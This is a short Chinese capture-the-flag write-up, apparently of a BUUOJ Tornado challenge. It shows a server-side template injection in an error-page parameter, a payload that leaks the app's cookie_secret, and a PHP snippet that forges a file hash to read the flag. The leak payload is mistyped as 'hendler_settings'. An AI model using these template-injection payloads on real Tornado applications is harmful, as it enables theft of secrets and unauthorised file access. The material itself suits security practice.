打開題目出現3個鏈接
/flag.txt 中提示flag in /fllllllllllllag
/welcome.txt 中提示 render
/hints.txt 中提示 md5(cookie_secret+md5(filename))
直接訪問/fllllllllllllag失敗。
百度了render可知,render是python的一個模板,他們的url都是由filename和filehash組成,filehash即為他們filename的md5值。
當filename或filehash不匹配時,將會跳轉到http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/error?msg=Error 頁面.
所以想到需要獲取cookie_secret來得到filehash
存在msg參數,百度之后發現師傅們可以進行模塊注入。嘗試了error?msg={{1}},發現的確存在模塊注入。
嘗試搜索tornado cookie_secret。發現cookie_secret存放在handler.settings中。
於是構建payload
http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/error?msg={{hendler_settings}}
得到'cookie_secret': '2cdad0e1-16ac-4881-861a-daecaa637c2c'
於是用php寫代碼獲取filehash值
<?php
$cookie_secret='2cdad0e1-16ac-4881-861a-daecaa637c2c';
$filename = '/fllllllllllllag';
$go = md5($cookie_secret . md5($filename));
echo $go;
?>
再次構建payload
http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/file?filename=/fllllllllllllag&filehash=98b8d02691da0221fc3fc43498a181d4
得到flag